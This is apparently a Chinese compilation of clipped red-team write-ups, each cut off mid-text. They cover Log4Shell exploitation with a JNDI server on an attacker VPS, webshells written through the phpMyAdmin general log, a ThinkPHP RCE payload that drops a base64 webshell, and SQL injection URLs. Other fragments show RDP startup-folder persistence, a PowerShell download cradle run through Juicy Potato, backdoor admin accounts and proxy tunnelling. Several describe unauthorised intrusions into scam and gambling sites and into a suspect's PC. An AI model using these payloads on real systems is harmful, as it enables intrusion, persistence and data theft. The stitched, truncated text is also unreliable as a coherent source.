红队攻击面相关讨论

网络拓扑 信息搜集渗透测试第一步当然是信息搜集 拿到 IP192.168.81.151我们先使用nmap对他进行常规TCP端口的扫描 nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151 发现开放了22,38080这两个端口 通过nmap我们可以得知这是一台Ubuntu，22是ssh，而38080这个端口是unknown的，我们尝试访问一下 于是尝试最近爆出的新漏洞 CVE-2021-44228 尝试看看能不能获取到 dnslog 发现存在 CVE-2021-44228漏洞，尝试去获取一个shell CVE-2021-44228 利用首先在我们的VPS kali(192.168.81.133) 开启一个LDAP： git clone https://github.com/black9/Log4shell_JNDIExploit.git java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133 然后在kali上nc监听9999端口： 我们使用TOMCATBYpass进行反弹shell /bin/ba…

前言一次攻防演练中首先是团队拿到了一个 Webshell ，后续又把权限弹到了 CobaltStrike 方便我来做内网渗透： 通过发现当前机器是一台公网服务器，只有公网 IP：xxx.xxx.xxx.16 通过查看 arp 缓存发现当前是有一些公网机器的： 通过查询这些 IP 发现是"某网络"，而且通过 Nbtscan 发现当前 C 段有主机存活：（初步判断当前 C 段机器有可能存在域，但不确定） 对当前第一层内网机器 C 段进行横向移动由于是攻防演练，拿到越多的分数越好，在这里就不考虑一些其他问题，拿到当前机器后我抓到了明文密码： 但是通过此密码去利用 MSF 对 C 段进行密码喷洒发现没有一台主机被成功横向出来： 就在这个时候我又扫了一下看看有没有 MS17010：（一般来说向这种"某某网"基本上都有几台存在永恒之蓝，所以直接去扫就行） 发现 92、151、200 这三台是存在 MS17010 的，随后打了 92 这台： 随后 MSF 和 CS 联动，我把 MSF 的 shell 又弹到了 Cs，并且做了权限维持： 这个时候其实用这两台跳板机器就够了，另外两台存在 MS17010 没必要继续打，随后我对当前 C 段进行信息搜集，对 Web 资产进行扫描存活发现大量 Web 资产： 通过手工分析发现一枚 SQL 注入，而且是 DBA 权限： 然后添加了一个管理员用户然后开启了 3389 （因为有诺顿，常规免杀没时间弄了，主要拿分，索性直接登录服务器） 而且直接通过 socks 连接不了，感觉是做了限制，后续发现使用 msts…

0x00 红队基础知识一、构建一个大型内网域环境搭建父域控制器子域控制器辅域控制器域内主机域内服务器二、Windows NTLM（NT LAN Manager）认证原理Kerberos 域内认证原理0x02 内网信息搜集篇一、工作组和大型域内网如何进行信息搜集如何搜集本机密码 MySQLSQL Server... ...Linux 如何搜索特定的密码文件搜集指定用户的命令历史记录中的各种明文密码Windows 2012 高版本以上如何搜集密码 Windows 2012 版本以下如何搜集密码 关于 Linux 下如何搜集各种密码信息 无线密码抓取 组册表里各种健值敏感信息 搜集数据库中保存的各类高价值账号密码 搜集保存在目标系统本地各种文档中的明文密码 针对各类常用 windows 办公软件的各类密码搜集 如何搜集VPN密码 如何搜集浏览器相关凭证 Chrome 浏览器抓取凭证Firefox 浏览器抓取凭证360 浏览器抓取凭证IE 浏览器抓取凭证如何搜集各种数据库信息 通过 LDAP 定位核心机器通过 LDAP 获取内网架构分布通过 LDAP 获取内网组织架构通过 LDAP 获取域内核心机器Mysql SQL Server Oracle PostgreSQL LDAP 根据当前跳板机器搜集网络环境（判断那种协议出网） 获取当前系统的详细IP配置，包括所在域, ip, 掩码, 网关, 主备 dns ip 获取当前系统最近的用户登录记录 获取当前用户的所有命令历史记录（针对于 Linux） 远程截屏捕捉目标用户敏感操作 获取当前机器环境变量（…

前言在内网渗透时，一个WebShell或CobaltStrike、Metasploit上线等，只是开端，更多是要内网横向移动，扩大战果，打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”，才能进一步攻击。可实战中因为网络环境不同，所利用的方式就不同。 本文内容按以下思维导图展开 目标出网（socks代理）这是实战中最愿意碰到的网络环境，目标机可以正常访问互联网，可直接在目标机挂socks代理或CobaltStrike上线，打通目标的内网通道。 frp(socks5)frp服务端配置文件 [common]bind_port = 8080 frp客户端配置文件 [common]server_addr = xx.xx.xx.xxserver_port = 8080#服务端口使用Web常见端口[socks5]type = tcpremote_port = 8088plugin = socks5use_encryption = trueuse_compression = true#socks5口令#plugin_user = SuperMan#plugin_passwd = XpO2McWe6nj3 此处添加了加密压缩这两个功能，默认是不开启的，根据作者介绍，压缩算法使用的是 snappy。 use_encryption = true 启用加密 [通信内容加密传输，有效防止流量被拦截] use_compression = true 启用压缩 [传输内容进行压缩，有效减小传输的网络流量，加快流量转发速度，但会额外消耗一些CPU资…

获取phpmyadmin弱口令 通过信息收集到彩票站点的ip为xxx，探测扫描发现存在phpmyadmin，通过猜测，使用默认弱口令(root/root)登入到phpmyadmin当中。 通过phpmyadmin后台sql查询写入shell到日志文件 使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。 流程和命令如下: 1、开启日志功能：set global general_log=on; 2、点击phpmyadmin变量查看日志文件名字: 这里的日志文件是test.php。 3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>'; 4、执行成功返回。 5、查看日志文件。 6、菜刀连接添加用户并且上传mimikatz。 使用菜刀连接日志文件木马，xxx/test.php 密码:test 查看发现是系统管理员sysytem权限，直接添加用户且添加到管理组即可。 命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add C:\Windows\system32\net.exe localgroup administrators Test /add 上传mimikataz到服务器当中。 7、3389连接，读取管理员密码。 （1）、直接telnet ip 3389 测试发现可通，于是直接连接3389进去。 （2）、或者这里在菜刀上执行以下命令查询3389开放的端口…

WEB ezphp 题目描述：一支专注于卫星通信技术的研究团队正在努力改进他们的通信系统，以提高数据传输的效率和安全性，团队决定采用PHP 8.3.2来完善通信系统开发。 考点：php filter chain Oracle PHP Filter链——基于oracle的文件读取攻击 参考：https://xz.aliyun.com/t/12939?time__1311=mqmhqIx%2BxfOD7DloaGkWepSazHG%3D4D#toc-16 题目给出源码如下 <?php highlight_file(__FILE__); // flag.php if (isset($_POST['f'])) { echo hash_file('md5', $_POST['f']); } ?> 这里可以用的项目：https://github.com/synacktiv/php_filter_chains_oracle_exploit/ 考点：可用PHP Filter链-基于oracle的文件读取攻击生成exp执行，题目提示php版本号正好满足条件，下载exp进行利用 执行payload，这里可能需要多跑几次才可以 python3 filters_chain_oracle_exploit.py --target http://eci-2zea1zzp9231ugqw9htd.cloudeci1.ichunqiu.com/ --file flag.php --parameter f …

1.pyc 使用pyc在线反编译得到python源码： #!/usr/bin/env python # visit https://tool.lu/pyc/ for more information # Version: Python 3.8 import random def encrypt_file(file_path): random.seed(114514) # WARNING: Decompyle incomplete file_path = "./flag" encrypt_file(file_path) 然后使用AI分析可得到它对应的解密脚本 import random import os def decrypt_data(encrypted_data): random.seed(114514) decrypted_data = bytearray() for byte in encrypted_data: key = random.randint(0, 128) decrypted_data.append(byte ^ key) return decrypted_data def read_file(file_path, mode='rb'): with open(file_path, mode) as file: return file.re…

近期在项目中管理员在rdp挂载之后搞掉了管理员，想着有时间就整理下针对rdp的利用方法。 针对挂盘的利用方法复制文件这个不多说，可以根据的不同的挂盘来决定是拖文件还是放启动项。有一些自动文件监控和拷贝的应用,如：https://github.com/cnucky/DarkGuardianDarkGuardian是一款用于监控RDP登录后TSCLIENT(挂盘)的工具,工具后台运行时可自动获取挂盘的文件列表,下载指定文件,拷贝木马文件到挂载硬盘的启动项等功能 RDPInception这种方法相对鸡肋一点，原理就是利用bat脚本放到server启动项/winlogon执行脚本处，等待管理员挂盘后重启执行命令。 @echo off echo Updating Windows ... @echo off timeout 1 >nul 2>&1 mkdir \\tsclient\c\temp >nul 2>&1 mkdir C:\temp >nul 2>&1 copy run.bat C:\temp >nul 2>&1 copy run.bat \\tsclient\c\temp >nul 2>&1 del /q %TEMP%\temp_00.txt >nul 2>&1 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s \\tscl…

近期因为都懂的原因做了回蓝队，还偶尔客串了下和客户对接的角色，根据接触到的各家设备的特点写了一些总结。从红队的视觉下看如何防止被溯源。 ---8sec.cc 1、蜜罐系统浏览器使用注意单独隔离的浏览器 在渗透过程中尽量使用与常用浏览器不同的浏览器，如：Chrome常用，渗透使用firefox。 使用无痕模式 firefox和Chrome都有无痕模式，如果对目标资产不了解的情况下尽量开启无痕模式进行测试。 以上两种方式主要可以避免蜜罐中使用各大网站的Jsonp Callback、XSS等漏洞获取到红队人员的ID和信息。 但是蜜罐中使用的fingerprintjs库可以根据不同IP和不同浏览器的特定标识来判断来源访客是否是同一个人员，所以单独使用无痕模式和不同的浏览器也会导致被蜜罐识别。 反蜜罐插件bypass HoneypotAntiHoneypot - 一个拦截蜜罐XSSI的Chrome扩展 功能截获页面中发起的XSSI请求，通过特征识别阻断可疑的XSSI（Jsonp Callback、XSS等）分析和攫取蜜罐固有特征，识别蜜罐并拦截所有请求判断fingerprintjs库是否存在并提示，判断是否有其他web指纹的相关调用判断是否有持久化身份标识的相关调用判断页面中是否对剪贴板的粘贴进行了取值（待进一步验证）一键清除当前网站的所有浏览器数据功能（包括所有缓存的、存储的）判断页面中是否操作了FileSystem（可以把evercookie写到这里）2、防止反制服务器跳板机 根据各家溯源获取信息量排除蜜罐因素也有一部分的原因是VPS被打…

WinRM实现端口复用这种攻击方式前提是需要帐号和密码，如果在获得hash的情况下也可以利用evil-winrm来实现hash登录 服务介绍WinRM全称是Windows Remote Management，是微软服务器硬件管理功能的一部分，能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统，获得一个类似Telnet的交互式命令行shell，而底层通讯协议使用的是HTTP。 后门应用在windows2012服务器中，winrm默认启动，开启了5985端口，在2008系统中需要手动开启服务 winrm quickconfig -q启动后防火墙也会放行该端口 设置启用httplistener监听并存 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //80 winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} //443 修改监听端口为80/443 winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} winrm set winrm/config/Listener?Address=*+Transport=HTTPS　 @{Port="443"} 本地连接也需要开启WinRM服务，然后设置信任连接的主机， winrm quickc…

前言在内网渗透时，一个WebShell或CobaltStrike、Metasploit上线等，只是开端，更多是要内网横向移动，扩大战果，打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”，才能进一步攻击。可实战中因为网络环境不同，所利用的方式就不同。 以下为自我总结“实战中内网穿透的打法”思维导图： 目标出网（socks代理）这是实战中最愿意碰到的网络环境，目标机可以正常访问互联网，可直接在目标机挂socks代理或CobaltStrike上线，打通目标的内网通道。 Frp（socks5） Frp服务端配置文件： 1 | [common] 2 | bind_port = 8080Frp客户端配置文件： 1 | [common] 2 | server_addr = xx.xx.xx.xx 3 | server_port = 8080 4 | #服务端口使用Web常见端口 5 | 6 | [socks5] 7 | type = tcp 8 | remote_port = 8088 9 | plugin = socks5 10 | use_encryption = true 11 | use_compression = true 12 | #socks5口令 13 | #plugin_user = SuperMan 14 | #plugin_passwd = XpO2McWe6nj3此处添加了加密压缩这两个功能，默认是不开启的，根据作者介绍，压缩算法使用的是 snappy。 use_encryption = true 启用加密…

前情提要上回故事说到，骗子服务器的最高权限虽然已经拿到，但这也只是技术层面的掌控，想要立案，需要提供尽量多的人员相关信息，如手机、银行卡等，但这些目前都并未采集到（前面虽然提到了某次源码有个银行账户，但后面发现那只是个测试号，百度出来一堆在用的…），所以还需要通过一些额外的手段去获取有用的信息； 信息收集宝塔后台首先想到的就是之前一直留着没进去的宝塔面板后台，里面应该会有些登录信息之类，但并没有得到登录密码，但这也并没有太大影响，因为现在可以直接访问宝塔的数据库文件（panel/data/default.db， sqlite数据库文件），所以直接进去备份个账户然后设置个密码，防止把正常账户挤下去： 清理下日志，然后就是愉快的登录进去 ㄟ( ▔, ▔ )ㄏ： 首先看到的就是账户名，想是管理员的手机号，这里看不全，去设置里面瞅瞅： 这里也是中间四位打了星号，从源码里也看不出，但这些也都是纸老虎，因为随后审查发现一处接口请求数据，返回信息里是完整的手机号，微信搜了下也有这个这么个账户： 但其真实性未知，多半只是个幌子，先记着吧； 新起点在之后某个时间点准备继续收集信息的时候，发现其域名甚至IP都无法再访问了，后面几天试了也都不行，感觉可能是收割完一波然受卷款跑路了；自然，除了一些信息，之前获取的所有权限，都化作泡影了；也是在这之后，警察蜀黍竟主动联系了过来（没有喝茶，俺是良民 $_$），由于想着再碰碰运气看看，结果有趣的事再次发生了，访问之前那个IP展示出了这么个页面： 好吧得承认，那一瞬间确实差点信了这标题和图标，还浪…

这是一则漫长又跌宕起伏的故事，小伙伴们请随意就坐，自备茶点；全文包含信息收集与攻克的详细全过程，以及对该类型诈骗思路的分析拆解，以提高防范意识； 0x00 梦的开始那是一个阳光明媚的晌午，日常的搬砖过程中收到一封公司邮件， 看到这熟悉的措辞，又瞄了一眼下面的附件内容，熟悉的气息扑面而来，就顺手保存了下来； 随即管理员立马发现了不对劲，追发邮件说员工账号被盗用，不要轻信邮件内容，原始邮件也被标为垃圾邮件（上次的类似邮件删的太突然，事情还没开始就结束了，这次总跑不掉了(￣_,￣ )，作为当代好青年，五星好市民，是时候发扬一下活雷锋精神了）； 而这张图片，就成了一切梦开始的地方…… 0x01 信息收集0x001 审查域名起始信息非常有限，开局一张图，剧情全靠猜，不过这个入口也足够了，先拿出家伙解析下二维码中的信息： 没有额外的数据，只有一串网页链接，看着这域名名称，嘴角微微上扬；先去解析一下域名： 到写文为止已经不能解析该域名了，整顿的倒挺快，不过好在之前有解析备份，域名万变不离其 IP，并且也没有发现使用 CDN，流量全部通往源站；顺手查了一下，是香港的服务器： 然后 whois 一下，搜集相关信息： 不出意外，又是用的三方注册机构，没有额外的有用信息，不过这个注册时间挺有意思，本月的，骗子同志动作还蛮快的；接下来只能去对方网站瞅瞅； 又是西部数码，看来有些备受青睐，网站提供隐私保护机制，注册信息不对外公开，暂时也获取不到有用信息； 0x002 审查 IP现在唯一的线索就是之前解析的那个 IP 了，一步一步来，先 …

0x01 前言 在一次攻防演练信息收集过程中，发现该网站和给的资产网站是同一IP段于是有了此次违法站点的渗透。 末尾可领取字典等资源文件 0x02 SQL漏洞发现 到站点进行访问 利用插件查看站点为php 常规扫目录 前台 一键登录之后在新增地址处发现存在注入 0x03 进一步漏洞利用 此处提示需要get传参，在address.php请求处，随便填了个数字请求后，继续填写信息并抓包跑sqlmap 经过长时间的等待，发现存在布尔盲注和报错注入 接下来找站点后台管理地址 利用注入得到的账号密码登入后台 0x04 任意文件上传 寻找上传点 上传 访问路径 直接上传php抬走 至此拿下了这个站点，简单高效 一套带走！

01 前言 近日无事闲逛，偶遇某群有人在招程序员帮忙写Exp和收shell啊收0day啊，又觉近日无文章可写，所以便尝试社会一波大佬。 首先呢先问问套路一下，看看他干啥的. 这个人想找人帮忙写批量的Exp 然后假装自己能写，先套路一波，进入角色，让对方以为我真的可以写。 这里呢，我说我自己搭建了一个站点，用于测试，然后叫他链接shell试试看看。是否OK！ 接着该目标并未上线，他将我搭建的站点发送给了他们手下的其他两个人。 02 技术一号 被我社工的这个某产人员，实际不懂技术，他将我的钓鱼页面发给了他们手下2个技术人员，其中一个上线的估计是个虚拟机，另外一个上线的则是物理机。所以这里只钓鱼到了一台。 这里一共上线了2台PC电脑，他们拥有统一的外网IP出口，柬埔寨显示地点，目前不知道真假。这个人就是我们所谓的脚本小子黑客。给各位看看他的PC都有那些资料。 脚本木马 各类实名证件 各种批量黑客工具 黑帽SEO关键词 入侵用的各类VPS机器 各类网站的账户 03 内网拓展渗透 每一个进程都有一个环境块，其中包含一组环境变量及其值。有两种类型的环境变量，用户环境变量和系统环境变量。 arp -a 看了一下。发现了如下机器。10多台。 192.168.1.1 78-44-fd-fd-55-b9 动态 192.168.1.13 6c-8d-c1-18-aa-b2 动态 192.…

一、插件介绍Turbo Intruder 是一个 Burp Suite 扩展插件，用于发送大量 HTTP 请求并分析结果，可拥抱十亿请求攻击。它旨在处理那些需要异常速度、持续时间或复杂性的攻击来补充Burp Intruder。二、插件原理使用第一次请求的时候就建立好连接，后续获取资源都是通过这条连接来获取资源的长连接，它还使用了HTTP 管道(HTTP Pipelining )的方式来发送 请求，这种方式会在等待上一个请求响应的同时，发送下一个请求。而在发送过程中不需要等待服务器对前一个请求的响应；只不过，客户端还是要按照发送请求的顺序来接收响应。通过 HTTP 管道的方式发起请求是短连接(Connection: close )速度的 6000% 三、安装方式Burp Suite的BApp Store安装Turbo intuder插件 四、使用方式 选中数据包右键选择Send to turbo intruder（这里一定要抓取数据包，没有抓取是不会显示send to tubo intruder菜单） 此时会打开一个新的窗口，该窗口上半部分区域为原始的HTTP请求包，下半部分为操作代码，中间部分可以根据场景从下拉框中选择具体操作代码。每次打开时此处默认为Last code used，即为上次使用的代码。 其中代码区需要使用“%s”字符来代替需要进行Fuzz的部分。选择对应的操作代码点击最下方Attack即可开始攻击。具体使用细节，可结合第三部分使用场景。 五、使用场景1.验证码爆破主要出现在手机验证或者邮箱验证码登录以…

0x01 准备工具 此次渗透实战主要针对安卓APP，菠菜APP后台服务器在境外，平台包含多款非法涉赌小游戏。 1、雷电安卓模拟器，用于运行赌博网站的安装程序。 2、抓包工具Fiddler（或burpsuite、 wireshark），用于流量抓包找到网站后台服务器地址。 3、Sublist3r、中国蚁剑等常规渗透工具。 0x02 信息搜集 1、寻找服务器地址。流量抓包分析网络菠菜APP的服务器地址。利用Fiddler抓取安卓模拟器流量，通过分析获取APP后台网站地址：http://****.com。抓包也可以用bp或者wireshark工具，网上教程比较多。 对抓包发现的域名“****.com”进行查询，发现目标服务器IP地址：x.x.x.x，并进一步对服务器IP在“站长之家”网站查询,确认服务器在境外。 2、获取子域名。 用Sublist3r.py 工具搜集域名， python Sublist3r.py -d xxx.com -o 1.txt发现一些子域名，测试未发现突破口 0x03 渗透过程 1、注册登录，发现HTML5页面。App页面注册登录，抓取地址，把抓取到地址拿到浏览器登录，发现APP页面是纯HTML5页面，这就更方便在浏览器里操作了。 2、尝试前台账号注入失败，利用测试号码注册然后Bp抓包改包，寻找注入点，但注入失败。 3、登录注册用户，发现上传漏洞。浏览用户功能，在个人中心处存在身份审核功能，需上传身份资料以核验用户信息，推断此上传功能可以隐藏木马上传点。 4、经上传fuzz测试…

一、信息收集拿到目标网站，可见是一个很常规的bc站。 先进行简单的信息收集，通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息 命令行nslookup+url查看ip,发现没有CDN 再到爱站上看看 嗯，柬埔寨可还行 知道ip地址后端口扫描一波（全端口扫描+服务探测。这个过程比较漫长，可以先干别的） 在扫描之余尝试3389连接远程桌面（因为开始已经看到是windows serve的服务器） 试了两次，猜测是修改端口了，或者是登录ip白名单？ 二、后台爆破回到web，反手在url后面加一个admin 后台出来了，这bc有点水啊，随手测了几个弱口令，无果 发现没有验证码校验，抓包爆破一波 通常找一些常规的弱口令进行爆破就够了 秒出密码：123456，我吐了，他们运维可能要被打死 三、寻找上传点这么简单就拿下了后台，我们当然不会满足。 大致浏览了一下后台的各个功能，寻找可以利用的地方，在系统管理处找到一处上传点 （有没有表哥发收款码过来，暴富的机会来了！） 随便写一个一句话，并将后缀改成.jpg并且抓包发送到Repeater查看 提示“不是真正的图片类型” ，在包内改成php后缀，提示非法文件类型 感觉是白名单+文件头校验，尝试图片马 尝试了几波，白名单限制得很死，没绕过去 顿时陷入了僵局，还是另外寻找突破口吧 四、峰回路转认真想了一下，它是Windows，而Windows的主流建站工具，宝塔，护卫神，phpstudy，upupw。之前看到它的php版本是5.2.17，正好想到前段时间爆出的phpstu…

0x01 前言 提示：当个反面案例看就好，实际上拿下的方式远没有下文说的那么麻烦，只怪自己太心急… 本来是之前BC项目搞下来的一个推广站，当时只拿到了Shell 权限是一个普通用户，想提权进一步收集服务器上的信息时，发现运行各种东西都是权限拒绝，提示组策略阻止了这个程序，当时因为还有的别的事情，就没继续研究了（项目已获得有关部门授权，用户名比较敏感，后面全程打码）。 0x02 Bypass Applocker 最近突然想起来了，就继续搞一下，问了下群里的师傅 知道是什么东西以后就好说了，耐心找一找总会有收获的，附上Applocker介绍： https://baike.baidu.com/item/Applocker/2300852?fr=aladdin然后就找到3g师傅的一篇文章： https://3gstudent.github.io/3gstudent.github.io/Use-msxsl-to-bypass-AppLocker/具体怎么利用就自行看文章吧，看完文章后续的大概思路差不多就清晰了 0x03 上线到提权 我想的是bypass applocker让目标服务器执行我的马子上线后在进行后续的提权，然而Shell下执行 net user、tasklist /SVC等等都没得回显，不然可以通过进程对比判断下杀软（自己写的小轮子，目前可匹配进程已经增加到960+了：http://get-av.se7ensec.cn/） 既然不知道，那我就拼一拼人品，赌一下主机里没有杀软，通过上面3g师傅文章…

这站真大，不对，这站真圆.php的站随便随便一测 一枚注入 因为只能读取32位所以使用substring分开读取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20# 舒服了，这下可以给光明正大的进去选内衣了 0x02 拿shell 看看robots.txt inurl:a.com admin 进入后台发现是ECSHOP 这里原本是file改为image绕过 似乎不行被重置了 这里发现可以执行sql语句而且存在绝对路径泄露 ok下面就好说了，写入一句话 0x03 提权 权限有点小低 存在mysql也没其他可以利用的 尝试mysql提权 除了目录不能上传其他条件都满足所以当我没说，上cs,powershell上线 提权这里使用Juicy Potato 具体可以参考三好学生文章 选择想要的任何CLSID,链接 然后我们在以system权限执行powershell shell style.exe -p "powershell.exe -nop -w hidden -c \"IEX ((new-objec…

0X00 歪打正着 无意间碰到一套垃圾菠菜网站杀猪盘 挨个访问能扫描出来的目录与文件发现并没有太大作用，不过发现了后台地址。phpmyadmin访问500。 访问xd.php到后台访问发现还需要授权验证码 试了下8888，123456之类的都提示错误，当场关闭。 尝试子域名爆破也只有一个。Nmap扫描也没有什么发现。返回首页发现url有点不常见。 0X01 寻找同类型网站以及源码这种搞诈骗的很少会开发肯定源码是从网上下载找人搭建的，不常见就是特征，于是搜索了下。 0X02 开始审计这么多网站那源码肯定烂大街了，于是花了点时间找到了源码，尝试审计。 下载回来源码用seay扫描下，源码又太大我也懒得去本地搭建，直接用源码对着目标进行怼。 从中发现了个fileupload.php文件好像有点问题。 访问目标发现也存在该文件。把该文件提取出来到本地搭建的环境中做测试。 直接访问会自动创建出upload和upload_tmp两个文件夹，这玩意是个demo这个点其实看起来更像个后门。 并且filename变量完全是可控的。 继续往下看发现一些判断，可以表单上传名就为file。文件上传 其他的就不用管了，直接改个上传表单。只要加上参数name和file就行了。 name参数控制上传文件名为aaa.php 选择1.jpg上传 上传后没有返回路径但是在upload下已经存在aaa.php文件。 SQL注入 变量中where的值又是来自request中，并且上面的checkinput中也没有检测type的…

逛QQ空间刷到了 于是有了下文。打开站点，很贴心，前台后台都可以进。 下面说漏洞点 sql注入，有一套程序基于某个模板二开，正好我手里有这套模板且审计过。所以轻松拿下。 无任何过滤，直接注即可。 任意文件上传 这个我怀疑是开发自己留的后门。 看得懂的人一眼就看出来了。直接本地新建表单提交即可。 但是目标站有个问题，上传不回显路径，应该是注释了echo。本地搭建测试， 上传文件名修改为这个格式。 思路：本地复现upload，然后和远程同时提交，同一个时间点，返回的文件名应该是一样的。 测试: 复现成功。 点到为止。 另求教各位精通php审计的大佬 这段代码可否有利用点。 尝试各种截断始终无法执行php代码。 转载于原文链接： https://mp.weixin.qq.com/s/hduQd7Jm72b00oSU9Ip1BQ

一、案例1因为最近吃鸡被外挂打自闭了，所以准备也让那些卖挂的体会一下什么叫做自闭。昨天晚上爬了快1000个卖吃鸡外挂的平台 你们这些卖挂的，等我有空了一个一个捶。 发现大多数都是用的一套aspx的程序，可惜没有源码不能白盒审计，黑盒也找不到什么洞 只能找找软柿子捏，昨天晚上一口气锤了四个 基本上都有宝塔 不过php-venom 4 系列加上配套的编码器过宝塔稳得一批 脱了裤子发现里面4000+数据 今天晚上又锤了一个吃鸡外挂站 可惜尴尬的是没有写入权限 写篇大水文记录一下 1. 无套路进后台 这个应该算是那种推广站，里面什么都没有，只有宣传内容 管你是什么，照锤不误。 看了一下是织梦二次开发的站 后台很容易进，这里大家都明白什么意思。 2.玄学后台发现后台删了很多功能，特别是织梦的坑货文件管理器 但是从经验上来说很多这种二次开发的并不是真的把编辑器删掉了，只是在后台页面不显示了。 审查元素启动 随便找个链接改一下，替换成media_main.php?dopost=filemanager 然后点击，果然找到了文件管理器页面 上传shell 本来以为就这样结束了 结果发现虽然提示上传成功但是啥都没有 还以为是waf，就换了人畜无害的一张jpg上去也是啥都没有 以为是目录权限问题 找到session的临时文件，上传，照样不行 图就不放了，总之就是传不上去 觉得可能是整站没写权限 随手试试删除功能，发现可以删文件 emmmmm，所以到底是有权限没有呢 一般来说没写权限的话也就没有修改权限，也就是没有删除权限 想着…

我们找到一个带有有漏洞的QP后台框架的后台 这个框架有很多的漏洞，比如用户遍历，我们如果输入一个存在的用户，密码错误时，就会提示用户或密码错误，如果我们输入一个不存在的用户，就会提示用户不存在 除此之外，网站还会存在SQL注入漏洞，我们只需要抓一个提交账号密码的POST包 粘贴好一个txt文档然后丢进sqlmap， 是mssql，我们可以开启xp_cmdshell，这里我们打算写入webshell，所以先os-shell判断出路径（超级慢） 然后利用xp_cmdshell写入webshell 成功上线 然后我打算上线cs进行下一步操作，尝试了web传递，但是被杀软拦住了 很烦，没办法，只能尝试免杀上线，这里我用的免杀方法是分离免杀 生成payload，然后写一个shellloader并且base64编译一下 我把shellcode放到了vps上 把shellloader上传到目标 一，二，三上线！ 没错，低权用户，多次尝试提权都不成功，最后还是sweetpotato拿下了 拿到了我最爱的system 添加用户 net user admin$ admin@123 /add添加到管理员组 net localgroup administrators test /add直接3389连接 拿到远程桌面本来打算fscan扫一下的，但是发现内网的ip和平常不一样，扫了一下发现出现很多主机，于是判断这是一个vps，故渗透到此为止。 转载于原文链接： https://mp.weixin.qq.co…

最近偶然发现一个虚拟货币买涨跌的杀猪盘，遂进行了一波测试，前台长这样。 为thinkphp5.0.5随用RCE进行打入，成功写入webshell。 s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7)) 查看发现phpinfo信息发现已经禁用所有能够执行系统命令的函数，且com和dl加载都不能用无法执行相应的系统命令如下所示： assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open //php如上系统命令都已禁用 但有文件的读写权限没有禁用assert()，file_put_contents()等函数，查看后发现为windows系统如下所示： 由于php执行系统命令的函数都被禁用了，从而导致无法执行系统命令很难受。之后下载了他的网站源码简单看了一波，发现其管理员cookie固定且可以伪造如下所示看着像后门： 故可后台登录绕过，管理员cookie固定，添加cookie字段即可登录绕过。浏览器f12，在cookie中添加上述键值访问index，即可成功后台登录如下所示好多钱(被骗的人好多)： 前台询问客…